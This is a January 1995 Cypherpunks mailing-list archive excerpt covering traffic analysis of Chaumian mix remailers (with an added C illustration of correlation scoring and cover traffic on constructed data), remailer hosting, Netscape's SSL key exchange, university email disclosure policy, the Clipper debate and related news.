> communicating with.  The idea is that with a Chaumian mix, every time 
> Alice sends a message to Bob there is always a pattern of Alice sending 
> a message to the mix, followed by Bob receiving a message from the mix 
> during the next batch.  By counting the number of such correlations for 
> each user over a period of time, and taking into account the fact that 
> users who receive more messages from the mix will have higher numbers
> of coincidental correlations, a SCORE can be calculated so that it would 
> be a good indication over the long run of the probability that a particular 
> user is communicating with Alice.

This sounds like a good idea.  It was very interesting to see your
earlier result on the impact of dummy messages on this approach.  Even a
relatively small number of batches without dummy messages allows
continual accumulation of incriminating information.

I know that the Eurocrypt 89 proceedings had some articles on
cryptanalyzing Chaum's mixes.  My library has an excellent crypto
selection but is missing this volume.  Can anyone who has read this say
whether there is anything in those papers that isn't obvious?

Another interesting aspect of your analysis is the possible role of
latency.  Earlier I had thought of latency as primarily a way of doing
mixing, an alternative or addition to batching which mixes messages
without holding them up quite as much.  But in terms of this in/out
analysis latency could play a part in blurring the batch boundaries,
adding more uncertainty and making the job of the analyst harder so he
would need more data to establish his scores.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLx/jixnMLJtOy9MBAQGFzwH/diYW0NSddacKyXGvsBc53FsR47R+4BSS
pVprHz2LfpVl7U2FFAePMjZIGr5w24hA6nxn1brAO9v6JkVzgUabvA==
=Vehs
-----END PGP SIGNATURE-----
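
The scoring idea in the quoted text, as an added example that is not part of either post: it shows why the correction for busy recipients matters and why a sender who puts something into every batch gives the observer nothing to count. The posts give no formula, so the score used here (observed coincidences minus the number expected from each user's overall receive rate) is an assumption; the batch table and every name other than Alice and Bob are constructed.

```c
#include <stdio.h>
#include <stddef.h>

#define USERS 4
static const char *const NAMES[USERS] = { "Bob", "Carol", "Dave", "Erin" };

struct batch {
    int alice_sent;              /* Alice put a message into this batch     */
    unsigned char recv[USERS];   /* recv[u] != 0: user u got one out of it  */
};

/* Constructed observations of 12 batches.  Alice really writes to Bob;
 * Carol simply receives mail in almost every batch. */
static const struct batch OBSERVED[] = {
    {1, {1,1,0,0}}, {0, {0,1,1,0}}, {1, {1,1,0,1}}, {0, {0,1,0,1}},
    {1, {1,0,1,0}}, {0, {0,1,1,0}}, {1, {1,1,0,0}}, {0, {1,1,0,1}},
    {0, {0,1,1,0}}, {1, {1,1,1,0}}, {0, {0,1,0,1}}, {0, {0,1,1,0}},
};
#define N_OBSERVED (sizeof OBSERVED / sizeof OBSERVED[0])

/* Batches in which Alice sent and user u received (the raw correlation). */
long raw_hits(const struct batch *b, size_t n, int u)
{
    long hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += b[i].alice_sent && b[i].recv[u];
    return hits;
}

/* Assumed SCORE: raw hits minus the hits expected by coincidence, i.e.
 * (batches Alice sent in) * (fraction of all batches in which u received). */
double score(const struct batch *b, size_t n, int u)
{
    long alice = 0, total = 0;
    if (n == 0)
        return 0.0;
    for (size_t i = 0; i < n; i++) {
        alice += b[i].alice_sent != 0;
        total += b[i].recv[u] != 0;
    }
    return (double)raw_hits(b, n, u)
         - (double)alice * (double)total / (double)n;
}

/* Index of the highest-scoring user (first one wins a tie). */
int best_match(const struct batch *b, size_t n)
{
    int best = 0;
    for (int u = 1; u < USERS; u++)
        if (score(b, n, u) > score(b, n, best))
            best = u;
    return best;
}

/* What the observer sees if Alice sends a real or dummy message into every
 * batch.  Simplification: dummies are dropped by the mix, so the set of
 * recipients per batch is unchanged. */
void add_sender_cover(const struct batch *in, struct batch *out, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        out[i] = in[i];
        out[i].alice_sent = 1;
    }
}

static void report(const char *label, const struct batch *b, size_t n)
{
    printf("%s\n", label);
    for (int u = 0; u < USERS; u++)
        printf("  %-6s raw hits %ld  score %+.3f\n",
               NAMES[u], raw_hits(b, n, u), score(b, n, u));
}

int main(void)
{
    struct batch covered[N_OBSERVED];

    report("no cover traffic:", OBSERVED, N_OBSERVED);
    printf("  highest score: %s\n", NAMES[best_match(OBSERVED, N_OBSERVED)]);

    add_sender_cover(OBSERVED, covered, N_OBSERVED);
    report("Alice sends into every batch:", covered, N_OBSERVED);
    return 0;
}
```

Without cover traffic the raw counts for Bob and Carol are 5 and 4, but only Bob keeps a positive score after the correction; with a message from Alice in every batch, every score is exactly zero.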




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Fri, 20 Jan 95 05:28:37 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.SUN.3.91.950120001338.7806B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501200807.A22183-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 20 Jan 1995, Charles Bell wrote:

> > 
> > The book "Temporary Autonomous Zone" is available online at wiretap.spies.com
> 
> Available how, exactly?
Sorry about that.
The hazards of being brief, I guess (never post when you're half asleep). 
Gopher and ftp work for the same address on this one.  
/Library/Documents/taz.txt is good for ftp, or try the   
/Electronic Books at Wiretap     heading on the first menu, if you use 
gopher. The pointers to the other etext sites might lead you to his other
stuff (there were two others as far as I can remember). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 20 Jan 95 06:22:45 PST
To: cypherpunks@toad.com
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201418.AA10378@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's WSJ

Front Page

Left Column

Less Is More

Libertarian Impulses
Show Growing Appeal
Among the Disaffected

When the Government Fails
    Many Voters are Asking:
    Who Needs it Anyway?

Mixed Blessing to the GOP



"Mr. Frezza...doesn't just want to cut government: He questions the very
need for most of it.  He figures that in a world in which computer wizards
are close to creating their own private, encrypted digital cash system for
making transactions without any government involvement, the need for
centralized authority is shriveling."


DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx/FiIVO4r4sgSPhAQEhmgP/dxCXAPS6iu/Zb9P7AuC6D8aDg94vZABs
VjlXXXXWjkHedveIjQ9qdU8xELblzZiMlu35SKKygLvsD2a8bNXiC2FxBnA/H716
Dj4UHksctV3wJSZuwq6z8/fZds0Dg5GJLYbAUrbdInp/tM7TMrAhUVLFVkVpzhzk
25aXzmIiv5U=
=4FOR
-----END PGP SIGNATURE-----
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 20 Jan 95 07:22:13 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501201520.AA03483@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal wrote about the PRZ case:

> (Sometimes it seems like the gov't is dragging this case out
> intentionally.  I believe the uncertainty does have a chilling effect on
> private development of strong crypto, which would be gone if the
> government announced it was not going to pursue the case, or if they did
> bring charges and lost.)

I've been slogging through a book on Dr. Gerald Bull, the semi-notorious
gun designer who was assassinated by parties unknown in the midst of
helping the Iraqis build several superguns.

In the late '70s, Bull was prosecuted and spent 4 months at the
Allentown pen for ITAR violations.  His company exported "technical
data," shell blanks, and various equipment useful for designing &
building howitzers to South Africa. The prosecuting US Attorney took
more than two years from original indictment to the actual trial. It
seems that the same mechanism is at work here.

Incidentally, Bull had at least made some effort to check with the
Office of Munitions Control about the legality of his exports; a
letter he received from them seemed to say that his planned exports
were legal.  The judge cited OMC's screwup as a factor affecting the
length of sentence.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx/UqKfb4pLe9tolAQHCxAP+OqnmoK/Eri0mNPnd3voMP+8YfpszVwFl
pCPntLHhL9TRYckhM+o504pJeBj2STc+aaIT5PTnCjd6aniGJy2QYgqYxALExbw9
EaM7fQXlwCqSS2u04/UzGmkmjgWqtUdAacu+C2gj+N61Aaay0ReR+DJBtP7rLypi
w3l74NhHFDA=
=fRtk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:28:01 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <9501201422.AA11305@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


There's a Hakim Bey web site with the full text of TAZ and a bunch of
other things, including the pamphlet "Radio Sermonettes" and various
other essays.  I've got the URL at home, so I can post it to the list
tonight (sorry, but it's easier than asking people to email me for it
individually).  The text, at that site at least, is the absolutely
authorized original (from our original files).  I've got other odds
and ends by H.B. that have never been made available on the net which
I may or may not get around to posting in the next few weeks.

The followup to TAZ (the book), which will probably be called "The
No-Go Zone," will be out in about six months.  Well, maybe nine...

   --Dave.


> From: Angus Patterson <s675570@aix1.uottawa.ca>
> 
> On Fri, 20 Jan 1995, Charles Bell wrote:
> 
> > > 
> > > The book "Temporary Autonomous Zone" is available online at wiretap.spies.com
> > 
> > Available how, exactly?
> Sorry about that.
> The hazards of being brief, I guess (never post when you're half asleep). 
> Gopher and ftp work for the same address on this one.  
> /Library/Documents/taz.txt is good for ftp, or try the   
> /Electronic Books at Wiretap     heading on the first menu, if you use 
> gopher. The pointers to the other etext sites might lead you to his other
> stuff (there were two others as far as I can remember). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:27:56 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <9501201424.AA11493@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: blancw@pylon.com
> 
> *T.A.Z. = The Autonomous Zone

T.A.Z. = Temporary Autonomous Zone

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:57:52 PST
To: cypherpunks@toad.com
Subject: And another thing (Hakim Bey)
Message-ID: <9501201448.AA13298@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


Also, the current issue of "Axcess" magazine (a slick cyber-zine)
has an interview with Hakim Bey in which he mentions the cypherpunks
as one of the few groups doing something worthwhile in cyberspace,
or words to that effect.  I'd post the short passage, but the copy
emailed to me by the editor was garbled (heh).

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 06:52:30 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <199501201451.JAA01734@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995 Mark Grant <mark@unicorn.com> said: 
 
 
Another source is via Nesta Stubbs inspirational home page: 
 
     http://www.mcs.com/~nesta/home.html 
 
The NO address is referenced by Nesta, stylistically inimicably.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Fri, 20 Jan 95 08:48:00 PST
To: cypherpunks@toad.com
Subject: Re: "Disclosing" private email
Message-ID: <199501201647.KAA01769@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Arthur Chandler posted to the list:
>   Greetings! I'd like to solicit your/our best thoughts on the following
> message. San Francisco State University is considering a policy of
> "disclosing" private email to outside agencies.  I'm aware that such a
> policy is yet another argument for using crypto; and the last cypherpunks
> meeting gave some encouraging instances of "transparent" encryption
> schemes that are not a hassle or a fear-barrier for newbies. 
>   But if you could post or private email me your thoughts about the 
> legal/ethical aspects of "disclosure," I'd be much obliged.
>   I've put a few of my own concerns at the end of the enclosed quote.
> 
It is probably a CYA move on the part of the University....if someone 
at SFSU is plotting the overthrow of our (or any other) government, 
engaging in espionage, child porn, etc. and using their Internet 
account, SFSU admin probably wants a way that they don't get held 
liable.

However, my view of this is that it sucks.
> 
> ---------- Forwarded message ----------
> 
> >From: "Deirdre C. Donovan" <deirdre@mercury.sfsu.edu>
> >
> >I am rewriting the information handouts which we here in San Francisco
> >give out to our students when they apply for Internet access accounts.
> >The issue with which I am struggling is one of privacy.  I have heard of
> >universities (anecdotally only) where the administration reserves the
> >right to read E-mail.  Here, we are leaning more toward something like the
> >paragraph below, which is taken verbatim from an Indiana University draft
> >document.
> >
> >        IU computing centers will maintain the confidentiality of all
> >        information stored on their computing resources.  Requests for
> >        disclosure of confidential information will be reviewed by the
> >        administrator of the computer system involved.  Such requests
> >        will be honored only when approved by University officials
> >        authorized by the [President] of the campus involved, or when
> >        required by state or federal law.  Except when inappropriate,
> >        computer users will receive prior notice of such disclosures.
> >
> 
>    I'm uneasy about the chain of "prior notice":
>   
>    1) Does this policy give university administrators the power to read
> private email before the decision is made to "disclose" it to outside
> persons or agencies? 
>  
It would have to...otherwise how would they know if they needed to 
disclose it.
>    2) Does this "prior notice" mean "We're going to do it" or "We plan to do 
> it, and if you disagree, let's discuss it before we release it"?
>   
From their perspective, prior notice would probably mean they tell 
you before they do it.  While I don't have experience specifically 
with SFSU, it seems as though large organizations tend to do whatever 
they please. 
>    3) What constitutes "inappropriate"?
> 
> 
Probably anything that is involved in an active criminal 
investigation.
> 
Note that anything in this message is just my opinion, and most 
assuredly could prove to be different when exposed to the real world!!

Brett Turcotte
turcotte@io.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:19:56 PST
To: ecarp@netcom.com
Subject: Re: Remailer-on-a-CD
Message-ID: <9501201619.AA01776@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Ed wrote:
>If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-
>bones Linux set that will install right in a DOS filesystem (it's a .ZIP file).
>It's intended for SLIP clients, but it could easily be adapted for setting
>up an "instant remailer".

I saw your announcement on comp.os.linux.announce right after suggesting the
"instant remailer" idea. (what timing!)  Already got it, and plan on playing
with it a little bit to see what fun we could have.  (5-floppy remailer
install, anyone?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:27:16 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <9501201626.AA03495@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


James wrote:
>Now this is OK if one wishes to run linux, and have a
>remailer as one hobby in addition to the main use of the
>box, but it is still a bit much to pay for a dedicated 
>remailer.
>
>Now I just do not like linux.  Sure it is a great
>operating system but it will not run codewright
>
>(Vi causes mental degeneration.  Even though I detest,
>loathe, and hate vi, vi takes up so much brainspace that
>I find myself issuing vi commands in editors that I 
>use much more, and vastly prefer to vi.  Vi is evil.)
>
>Therefore there is no way in the world I am going to
>waste a full internet connection and a PC on linux.

Would it be better if you didn't have to dedicate your box to Linux, but
just ran it every so often when you weren't playing with Codewright?  If you
had some store-and-forward mail system (like UUCP or Fido), you wouldn't
need to say goodbye to DOS/Windows.

I envision a setup right now where you could (if you wanted) type "remailer"
at the DOS prompt to bring the remailer up.  The screen would show a
monitor-type program, with a menu option to "R)eboot" to DOS again (or you
could just hit Ctrl-Alt-Del).

Oh, and I'd probably package a much nicer editor than vi with it.  Believe
it or not, the state of Unix editors has progressed beyond vi (and even
emacs).  But that's assuming you'd need to pull up an editor at all...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 20 Jan 95 03:34:50 PST
To: cypherpunks@toad.com
Subject: Netscape, RC4, key exchange?
Message-ID: <19875.9501201052@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

grendel@netaxs.com wrote:
> aba@atlas.ex.ac.uk wrote:
> > I have code to generate the RSA key pairs and modulus, what I am
> > looking for is code to factorise a number using one of the better
> > algorithms (quadratic sieve, etc.).
>
>	It's been established that the encryption in Netscape is 40 bit 
>RC4, not 40 bit RSA, [...]

Ok, so Netscape (the exported version only?) uses 40bit RC4 for
encryption, but what about key exchange?  RC4 is a stream cypher so
both the receiver and sender need to know the key.  Does anybody know
what method Netscape uses to exchange keys DH, RSA, other? and what
key sizes?

Adam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUALx+TkSnIuJ1VakpnAQEuBQP/TAiX81goT8r3KnvFh3WCm6TvzjUNAaEl
G8NI5ELom8CWgIYp1uli+V+s0nRgZCKfZAvfeQrG97p2blSK0tOsZyV3E6cYKgXo
yGcGUJZ8UdvBL0A93LJcU4LZEUITcC9/3HS09QD2oZBGzSettHk3nwKMmEer65OU
QLsrRildnuw=
=3vQF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Fri, 20 Jan 95 08:09:07 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: AT&T IVES chip
In-Reply-To: <9501192243.AA21298@toad.com>
Message-ID: <9501201903.AA04432@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> The IVES chip will be used in AT&T cable-TV-boxes this year.
> 
> It is available to OEM's for Internet data security applications.
> 
> IVES uses algorithms licensed from RSA.

This seems like good news..

e.g., cable systems are installing phone systems on the cable and
doing transactions via the cable (pay per view, home shopping, etc.)

A fear of mine was the Clipper was intended as the encryption standard
for all of this. Since AT&T appears to have a chip set that uses
RSA I consider this good...

Assuming it doesn't have escrow, etc.

Recall one of the major current vendors of cable converter boxes has
licensed clipper. (I forget which one).

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Fri, 20 Jan 95 11:31:52 PST
To: cypherpunks@toad.com
Subject: IRS "DataBase"
Message-ID: <B66ZVPAGGZZG*SADLER_C@HOSP.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    In reference to the IRS database, I heard this announced on the radio 
    this morning - that the database has existed for years and that it is 
    being worked currently rather enthusiastically. The news announcer 
    somewhat exaggerated the comment that followed which seemed to make 
    clear the fact that we members of "John Q. Public" would NOT have access 
    to these records to review or correct them. The DJ and others picked it 
    up and talked about it afterwards and obviously did not approve. I 
    believe that the IRS is exempt from many laws, so is this for real???
    
    Digital Cash? Probably.
    Anonymous Buying? Wishful Thinking?
    
    Why not just get 10% tax from everyone and be done with it?
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Fri, 20 Jan 95 11:20:54 PST
To: cypherpunks@toad.com
Subject: Cone order?
Message-ID: <199501201920.LAA26763@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Are these two stories related?


Associated Press reports on 1/20/95: 

>Hewlett-Packard Co. has been awarded a $672 million contract to build a 
>computer system linking 20,000 terminals for the military, Sen. Bob Smith 
>announced. 
   
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
It was previously reported:

>From rsalz@osf.org
>Date: Thu, 19 Jan 95 14:25:01 -0500
>From: Rich Salz <rsalz@osf.org>
>To: cypherpunks@toad.com
>Subject: Re: Cone of silence update
>
>---------- Begin Forwarded Message ----------
>Date: Wed, 18 Jan 95 21:03:02 -0500
>From: burton@het.brown.edu (Joshua W. Burton)
>To: silent-tristero@world.std.com
>Subject: Cone of silence update

[...]

>GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE
>
>WASHINGTON - When the US intelligence community recently decided to
>modernize the way it communicates, it did what countless other 
>government agencies, businesses and individuals have done over the
>last few years:  it turned to the Internet.
>
>But the regular Internet wouldn't do.  For spies and other government
>officials concerned about secrecy, that very public, very uncontrollable
>global mesh of computer networks was too risky a place to do business.
>
>So the intelligence community created its own Internet.
>
>Dubbed Intelink and based on the same technology used to run and
>navigate the original Internet, this new network for sharing supersecret
>information---including satellite imagery and video footage---officially
>began operating just a few weeks ago.
>
>When the bugs are worked out and a final system is in place, it will 
>allow analysts, policy-makers, military officials and soldiers in the
>field to tap quickly and directly into classified information at the
>Central Intelligence Agency, the National Security Agency, the Pentagon
>and diverse other parts of the national security bureaucracy.

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:32:04 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: Electronic cash illegal? (fwd)
Message-ID: <9501201930.AA01571@doom>
MIME-Version: 1.0
Content-Type: text/plain



Derek writes:
> > As far as I know, the legal definition of a "dollar" in the US is still a
> > certain weight of silver, and payment in silver legally satisfies debts;
> > under current silver prices, that probably costs more than a 
> > $1 US Federal Reserve Note, so nobody bothers.
> 
> Uhh, no, US currency does not have any backing.  I believe it was
> Nixon who stopped it, possibly even earlier than him.  There _used_ to
> be Gold- and Silver-backed dollars, but no longer.

Correct.  Nixon dismantled the Bretton Woods system in (I think) '71.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Fri, 20 Jan 95 11:35:53 PST
To: cypherpunks@toad.com
Subject: *More* wiretaps?
Message-ID: <199501201935.LAA03670@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Associated Press reported on 1/20/95:
 
>Secretary of State Warren Christopher Friday announced 
>plans to combat narcotics smuggling and terrorism with tougher 
>laws and sentences and tighter control on visas for entering the 
>United States. 
>   
>A senior State Department official said wiretapping was among the 
>measures to be proposed to the Republican-controlled Congress. The 
>official said there were ways to use wiretaps without violating 
>Supreme Court restrictions. 


Since wiretapping on court order from their no-questions-asked secret 
court is already allowed, can they mean anything other than wiretapping 
without court order?

Can somebody explain to me why the Clinton administration is
considered "liberal"?  Why the Republicans are considered
"conservative"?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:39:14 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <9501201936.AA01622@doom>
MIME-Version: 1.0
Content-Type: text/plain



>    From: frissell@panix.com (Duncan Frissell)
> 
>    I offer to pay for and operate a remailer account on any system that will
>    have me.
> 
> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
> the other standard extensions.

As it happens, I just signed up for a SLIP account at Best.  I'm using
their standard dial-up service, but they also offer a dedicated 28.8
connection for $450 setup and $60/mo.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 08:39:48 PST
To: cypherpunks@toad.com
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201639.LAA14304@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995 frissell@panix.com (Duncan Frissell) said: 
 
 
Duncan aptly points to the WSJ article, lots of c'punk topics mentioned. 
 
For email copy send blank message with subject:  LIB_yep 
 
 
Meanwhile, here's a taste: 
 
 
   Mr. Willis says the libertarian concept has particular 
   appeal to people in the computer industry. "We have more 
   members in one computer company in Seattle than in some 
   whole counties, and that company is Microsoft," he says. 
 
 
   Indeed, when Mr. Frezza, the Philadelphia computer 
   consultant, last month launched a computer network of like- 
   minded thinkers called DigitaLiberty, he was so overwhelmed 
   with responses, especially from college students, that he 
   had to temporarily shut down the group's electronic 
   mailbox. 
 
 
   One member of DigitaLiberty is Bruce Fancher, a 23-year-old 
   who in the late 1980s earned brief notoriety as a hacker 
   who broke into computer systems, though he was never 
   charged with a crime. He is president of a computer 
   communications company called Phantom Access Technologies 
   Inc. "Being involved in computers or the Internet, you 
   inevitably move toward being a libertarian," he says. "It 
   is basically possible to keep all of your secrets from 
   prying eyes, particularly the prying eyes of the federal 
   government." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Fri, 20 Jan 95 12:25:09 PST
To: aba@atlas.ex.ac.uk
Subject: Re: Netscape, RC4, key exchange?
Message-ID: <9501201949.AA17175@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <19875.9501201052@exe.dcs.exeter.ac.uk>, you write:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> grendel@netaxs.com wrote:
> > aba@atlas.ex.ac.uk wrote:
> > > I have code to generate the RSA key pairs and modulus, what I am
> > > looking for is code to factorise a number using one of the better
> > > algorithms (quadratic sieve, etc.).
> >
> >	It's been established that the encryption in Netscape is 40 bit 
> >RC4, not 40 bit RSA, [...]
> 
> Ok, so Netscape (the exported version only?) uses 40bit RC4 for
> encryption, but what about key exchange?  RC4 is a stream cypher so
> both the receiver and sender need to know the key.  Does anybody know
> what method Netscape uses to exchange keys DH, RSA, other? and what
> key sizes?

If you read the spec (http://www.mcom.com/info/SSL.html), you will see
that SSL uses RSA public key encryption for key exchange. However, the
protocol is slightly more general than that, so if there is a
different public key algorithm it is possible for SSL to support it.

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 09:03:27 PST
To: s675570@aix1.uottawa.ca
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.3.89.9501200130.A35161-0100000@aix1.uottawa.ca>
Message-ID: <199501201702.MAA23498@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Of course, one could always just buy them on paper (remember that?)

Actually, you can't (right now.)  The publisher is out of stock, expects
to get more in in March.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 09:07:23 PST
To: cypherpunks@toad.com
Subject: IBM Contra Beltway
Message-ID: <199501201706.MAA17161@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan or others may give a more elegant report on the Clipper debate here
in NYC last night. 
 
 
My pleasant surprise was to see the IBM rep, William Whitehurst, far
outpace the inside the beltway types, EFF's Daniel Weitzner, the White
House's Michael Nelson, FBI's Kallstrom and ex-NSA Stewart Baker, as well
as the local urbane handsome attorney-mathematician moderator, Albert
Wells, who baby-talked the suits through the arcana. 
 
 
Mr. Whitehurst showed more intelligence about crypto -- domestically,
politically, economically and politically -- than any of the others.  No
flash, no preening, just hard-nosed reports on what's happening, and what's
not, due to USG cupidity, with the international spread of the heinous
munition.  He said industry is impatiently waiting for the USG to cooperate
or get the fuck out of the way.  Well, not quite, but close. 
 
 
The others seemed entranced by the domestic political morass. 
 
 
Kallstrom recited the oft-ridden horse-threats, some miscreant clapped, and
he said, "child pornographer".  All laughed or winced or stared in
pin-striped disbelief at the disrespect shown. 
 
 
Mr. Weitzner recited that the crypto genie is out of the bottle.  Kallstrom
said over my dead body or something like that, glowering at the crowd. 
 
 
The dapper man in front of me pulled up his sock to show his ankle holster.
 Protecting the nation's chief protector against high-criminals.  I ran out
before getting plugged "accidentally". 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 09:10:05 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: traffic analyzing Chaum's digital mix
In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com>
Message-ID: <199501201708.MAA23560@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| -----BEGIN PGP SIGNED MESSAGE-----
| 
| From: Wei Dai <weidai@eskimo.com>
| > I have been thinking about the problem of traffic analysis of a 
| > remailer.
| > [...]
| > The basic approach is to use this raw traffic information to calculate a 
| > SCORE for each user of the remailer with respect to Alice, where the 
| > user with the highest SCORE is the person Alice is most probably 
| > communicating with.  The idea is that with a Chaumian mix, every time 
| > Alice sends a message to Bob there is always a pattern of Alice sending 
| > a message to the mix, followed by Bob receiving a message from the mix 
| > during the next batch.  By counting the number of such correlations for 

| This sounds like a good idea.  It was very interesting to see your
| earlier result on the impact of dummy messages on this approach.  Even a
| relatively small number of batches without dummy messages allows
| continual accumulation of incriminating information.

	It would seem that Alice can protect Bob (or Bob can protect
himself) by engaging in multiple conversations through the mix.  I was
thinking earlier about the concept of bit buckets; people who agree to
get mail that they ignore.  Alice could, when talking to Bob, send
copies along the way to Fred, George, and Harry, each of whom would be
running a mailbot that sees the mail is not for them, and deletes it
(or, perhaps better, generates a response of encrypted nonsense to
flow through the mix for a while.)

Adam


-- 
